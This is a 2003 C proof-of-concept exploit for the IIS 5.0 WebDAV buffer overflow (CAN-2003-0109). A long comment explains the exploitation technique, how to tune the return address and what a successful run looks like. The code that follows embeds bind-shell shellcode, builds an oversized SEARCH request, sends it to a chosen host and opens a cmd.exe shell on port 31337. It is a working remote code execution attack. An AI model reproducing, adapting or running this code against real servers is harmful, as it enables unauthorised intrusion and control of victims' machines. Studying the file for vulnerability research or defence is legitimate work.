/*************************************/ /* IIS 5.0 WebDAV -Proof of concept- */ /* [ Bug: CAN-2003-0109 ] */ /* By Roman Medina-Heigl Hernandez */ /* aka RoMaNSoFt */ /* Madrid, 23.Mar.2003 */ /* ================================= */ /* Public release. Version 1. */ /* --------------------------------- */ /* -= http://www.rs-labs.com/ =- */ /*************************************/ /* ================================================================================================== * --[ READ ME ] * * This exploit is mainly a proof of concept of the recently discovered ntdll.dll bug (which may be * exploited in many other programs, not necessarily IIS). Practical exploitation is not as easy as * expected due to difficult RET guessing mixed with possible IIS crashes (which makes RET brute * forcing a tedious work). The shellcode included here will bind a cmd.exe shell to a given port * at the victim machine so it could be problematic if that machine is protected behind a firewall. * For all these reasons, the scope of this code is limited and mainly intended for educational * purposes. I am not responsible of possible damages created by the use of this exploit code. * * The program sends a HTTP request like this: * * SEARCH /[nop] [ret][ret][ret] ... [ret] [nop][nop][nop][nop][nop] ... [nop] [jmpcode] HTTP/1.1 * {HTTP headers here} * {HTTP body with webDAV content} * 0x01 [shellcode] * * IIS converts the first ascii string ([nop]...[jmpcode]) to Unicode using UTF-16 encoding (for * instance, 0x41 becomes 0x41 0x00, i.e. an extra 0x00 byte is added) and it is the resultant * Unicode string the one producing the overflow. So at first glance, we cannot include code here * (more on this later) because it would get corrupted by 0x00 (and other) inserted bytes. Not at * least using the common method. Another problem that we will have to live with is our RET value * being padded with null bytes, so if we use 0xabcd in our string, the real RET value (i.e. the * one EIP will be overwritten with) would be 0x00ab00cd. This is an important restriction. * * We have two alternatives: * * 1) The easy one: find any occurrences of our ascii string (i.e. before it gets converted to * the Unicode form) in process memory. Problem: normally we should find it by debugging the * vulnerable application and then hardcode the found address (which will be the RET address) * in our exploit code. This RET address is variable, even for the same version of OS and app * (I mean, different instances of the same application in the same machine could make the * guessed RET address invalid at different moments). Now add the restriction of RET value * padded with null-bytes. Anyway, the main advantage of this method is that we will not have * to deal with 0x00-padded shellcode. * * 2) The not so-easy one: you could insert an encoded shellcode in such a way that when the app * expands the ascii string (with the encoded shellcode) to Unicode, a valid shellcode is * automagically placed into memory. Please, refer to Chris Anley's "venetian exploit" paper * to read more about this. Dave Aitel also has a good paper about this technique and indeed * he released code written in Python to encode shellcode (I'm wondering if he will release a * working tool for that purpose, since the actual code was released as part of a commercial * product, so it cannot be run without buying the whole product, despite the module itself * being free!). Problem: it is not so easy as the first method ;-) Advantage: when the over- * flow happens, some registers may point to our Unicoded string (where our Unicoded-shellcode * lives in), so we don't need to guess the address where shellcode will be placed and the * chance of a successful exploitation is greatly improved. For instance, in this case, when * IIS is overflowed, ECX register points to the Unicode string. The idea is then fill in * RET value with the fixed address of code like "call %ecx". This code may be contained in * any previosly-loaded library, for example). * * Well, guess it... yes... I chose the easy method :-) Perhaps I will rewrite the exploit * using method 2, but I cannot promise that. * * Let's see another problem of the method 1 (which I have used). Not all Unicode conversions * result in a 0x00 byte being added. This is true for ascii characters lower or equal to 0x7f * (except for some few special characters, I'm not sure). But our shellcode will have bytes * greater than 0x7f value. So we don't know the exact length of the Unicoded-string containing * our shellcode (some ascii chars will expand to more than 2 bytes, I think). As a result, * sometimes the exploit may not work, because no exact length is matched. For instance, if you * carry out experiments on this issue, you could see that IIS crashes (overflow occurs) when * entering a query like SEARCH /AAAA...AAA HTTP/1.1, with 65535 A's. Same happens with 65536. * But with different values seems NOT to work. So matching the exact length is important here! * * What I have done, it is to include a little "jumpcode" instead of the shellcode itself. The * jumpcode is placed into the "critical" place and has a fixed length, so our string has always * a fixed length, too. The "variable" part (the shellcode) is placed at the end of the HTTP * request (so you can insert your own shellcode and remove the one I'm using here, with no apparent * problem). To be precise, the end of the request will be: 0x01 [shellcode]. The 0x01 byte marks * the beginning of the shellcode and it is used by the jumpcode to find the address where shell- * code begins and jump into it. It is not possible to hardcode a relative jump, because HTTP * headers have a variable length (think about the "Host:" header and you will understand what * I'm saying). Well, really, the exploit could have calculated the relative jump itself (other * problems arise like null-bytes possibly contained in the offset field) but I have prefered to * use the 0x01 trick. It's my exploit, it's my choice :-) * * After launching the exploit, several things may happen: * - the exploit is successful. You can connect to the bound port of victim machine and get a * shell. Great. Remember that when you issue an "exit" command in the shell prompt, the pro- * cess will be terminated. This implies that IIS could die. * - exploit returns a "server not vulnerable" response. Really, the server may not be vulnerable * or perhaps the SEARCH method used by the exploit is not permitted (the bug can still be * exploited via GET, probably) or webDAV is disabled at all. * - exploit did not get success (which is not strange, since it is not easy to guess RET value) * but the server is vulnerable. IIS will probably not survive: a "net start w3svc" could be * needed in the victim machine, in order to restart the WWW service. * * The following log shows a correct exploitation: * * roman@goliat:~/iis5webdav> gcc -o rs_iis rs_iis.c * roman@goliat:~/iis5webdav> ./rs_iis roman * [*] Resolving hostname ... * [*] Attacking port 80 at roman (EIP = 0x00480004)... * [*] Now open another console/shell and try to connect (telnet) to victim port 31337... * * roman@goliat:~/iis5webdav> telnet roman 31337 * Trying 192.168.0.247... * Connected to roman. * Escape character is '^]'. * Microsoft Windows 2000 [Versi¢n 5.00.2195] * (C) Copyright 1985-2000 Microsoft Corp. * * C:\WINNT\system32> * * * I am not going to show logs for the faulty cases. I'm pretty sure you will see them very * soon :-) But yes, the exploit works, perhaps a little fine-tunning may be required, though. * So please, do NOT contact me telling that the exploit doesn't work or things like that. It * worked for me and it will work for you, if you're not a script-kiddie. Try to attach to the * IIS process (inetinfo.exe) with the help of a debugger (OllyDbg is my favourite) on the * victim machine and then launch the exploit against it. Debugger will break when the first * exception is produced. Now place a breakpoint in 0x00ab00cd (being 0xabcd the not-unicoded * RET value) and resume execution until you reach that point. Finally, it's time to search * the memory looking for our shellcode. It is nearly impossible (very low chance) that our * shellcode is found at any 0x00**00**-form address (needed to bypass the RET restriction * imposed by Unicode conversion) but no problem: you have a lot of NOPs before the shellcode * where you could point to. If EIP is overwritten with the address of such a NOP, program flow * will finish reaching our shellcode. Note also that among the two bytes of RET that we have some * kind of control, the more important is the first one, i.e. the more significant. In other * words, interesting RET values to try are: 0x0104, 0x0204, 0x0304, 0x0404, 0x0504, ..., * and so on, till 0xff04. As you may have noticed, the last byte (0x04) is never changed because * its weight is minimal (256 between aprox. 65000 NOP's is not appreciable). * * I will be happy to receive ideas, comments and feedback about issues related to this exploit * and the exploited vulnerability itself. Drop me an e-mail. No script-kiddies, please. * * My best wishes, * --Roman * * ================================================================= --[ EOT ]-- ==================== */ #include #include #include #include #include #include #include #include // Change to fit your need #define RET 0x4804 // EIP = 0x00480004 #define LOADLIBRARYA 0x0100107c #define GETPROCADDRESS 0x01001034 // Don't change this #define PORT_OFFSET 1052 #define LOADL_OFFSET 798 #define GETPROC_OFFSET 815 #define NOP 0x90 #define MAXBUF 100000 /* * LoadLibraryA IT Address := 0100107C * GetProcAddress IT Address := 01001034 */ unsigned char shellcode[] = // Deepzone shellcode "\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c" "\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04" "\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99" "\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14" "\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b" "\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9" "\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x99\xf3" "\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99" "\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99" "\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9" "\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9" "\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c" "\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf" "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf" "\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc" "\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9" "\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9" "\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x5e\x1c" "\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99" "\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89" "\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\xcf\xf3" "\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1" "\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf" "\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\xbd\xd9" "\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66" "\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99" "\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x99\xcf" "\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99\x32" "\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14" "\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3" "\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\xaa\x59" "\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70" "\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66" "\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x96\x1b" "\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99" "\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9" "\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\xfc\xbf" "\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70" "\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66" "\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9" "\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99" "\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\xfc\xbf" "\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9" "\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6" "\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe" "\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8" "\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66" "\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99\x14" "\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34" "\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9" "\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x1c\xf8" "\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8" "\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c" "\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x70\x20" "\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b" "\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b" "\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\xcf\xf1" "\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7\xc8" "\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x35\x1d" "\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\xda\xd2" "\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd" "\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed" "\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6" "\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\xd7\xdc" "\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc" "\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff" "\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc" "\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9" "\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6" "\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0" "\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xda" "\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0" "\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd" "\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\xf8\xf7" "\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xa7" "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99" "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99" "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90"; unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7"; /* mov edi, ecx * xor al, al * inc al * repnz scasb * jmp edi */ char body[] = "\r\n\r\n" \ "\r\nSelect \"DAV:displayname\" from scope()\r\n\r\n\r\n"; /* Our code starts here */ int main (int argc, char **argv) { unsigned long ret; unsigned short port; int tport, bport, s, i, j, r, rt=0; struct hostent *h; struct sockaddr_in dst; char buffer[MAXBUF]; if (argc < 2 || argc > 5) { printf("IIS 5.0 WebDAV Exploit by RoMaNSoFt . 23/03/2003\nUsage: %s [target port] [bind port] [ret]\nE.g 1: %s victim.com\nE.g 2: %s victim.com 80 31337 %#.4x\n", argv[0], argv[0], argv[0], RET); exit(-1); } // Default target port = 80 if (argc > 2) tport = atoi(argv[2]); else tport = 80; // Default bind port = 31337 if (argc > 3) bport = atoi(argv[3]); else bport = 31337; // Default ret value = RET if (argc > 4) ret = strtoul(argv[4], NULL, 16); else ret = RET; if ( ret > 0xffff || (ret & 0xff) == 0 || (ret & 0xff00) == 0 ) { fprintf(stderr, "RET value must be in 0x0000-0xffff range and it may not contain null-bytes\nAborted!\n"); exit(-2); } // Shellcode patching port = htons(bport); port ^= 0x9999; if ( ((port & 0xff) == 0) || ((port & 0xff00) == 0) ) { fprintf(stderr, "Binding-port contains null-byte. Use another port.\nAborted!\n"); exit(-3); } *(unsigned short *)&shellcode[PORT_OFFSET] = port; *(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999; *(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999; // If the last two items contain any null-bytes, exploit will fail. // WARNING: this check is not performed here. Be careful and check it for yourself! // Resolve hostname printf("[*] Resolving hostname ...\n"); if ((h = gethostbyname(argv[1])) == NULL) { fprintf(stderr, "%s: unknown hostname\n", argv[1]); exit(-4); } bcopy(h->h_addr, &dst.sin_addr, h->h_length); dst.sin_family = AF_INET; dst.sin_port = htons(tport); // Socket creation if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("Failed to create socket"); exit(-5); } // Connection if (connect(s, (struct sockaddr *)&dst, sizeof(dst)) == -1) { perror("Failed to connect"); exit(-6); } // Build malicious string... printf("[*] Attacking port %i at %s (EIP = %#.4x%.4x)...\n", tport, argv[1], ((ret >> 8) & 0xff), ret & 0xff); bzero(buffer, MAXBUF); strcpy(buffer, "SEARCH /"); i = strlen(buffer); buffer[i] = NOP; // Align for RET overwrite // Normally, EIP will be overwritten with buffer[8+2087] but I prefer to fill some more bytes ;-) for (j=i+1; j < i+2150; j+=2) *(unsigned short *)&buffer[j] = (unsigned short)ret; // The rest is padded with NOP's. RET address should point to this zone! for (; j < i+65535-strlen(jumpcode); j++) buffer[j] = NOP; // Then we skip the body of the HTTP request memcpy(&buffer[j], jumpcode, strlen(jumpcode)); strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n"); sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", argv[1], strlen(body) + strlen(shellcode)); strcpy(buffer+strlen(buffer), body); // This byte is used to mark the beginning of the shellcode memset(buffer+strlen(buffer), 0x01, 1); // And finally, we land into our shellcode memset(buffer+strlen(buffer), NOP, 3); strcpy(buffer+strlen(buffer), shellcode); // Send request if (send(s, buffer, strlen(buffer), 0) != strlen(buffer)) { perror("Failed to send"); exit(-7); } printf("[*] Now open another console/shell and try to connect (telnet) to victim port %i...\n", bport); // Receive response while ( (r=recv(s, &buffer[rt], MAXBUF-1, 0)) > 0) rt += r; // This code is not bullet-proof. An evil WWW server could return a response bigger than MAXBUF // and an overflow would occur here. Yes, I'm lazy... :-) buffer[rt] = '\0'; if (rt > 0) printf("[*] Victim server issued the following %d bytes of response:\n--\n%s\n--\n[*] Server NOT vulnerable!\n", rt, buffer); else printf("[*] Server is vulnerable but the exploit failed! Change RET value (e.g. 0xce04) and try again (when IIS is up again) :-/\n", bport); close(s); }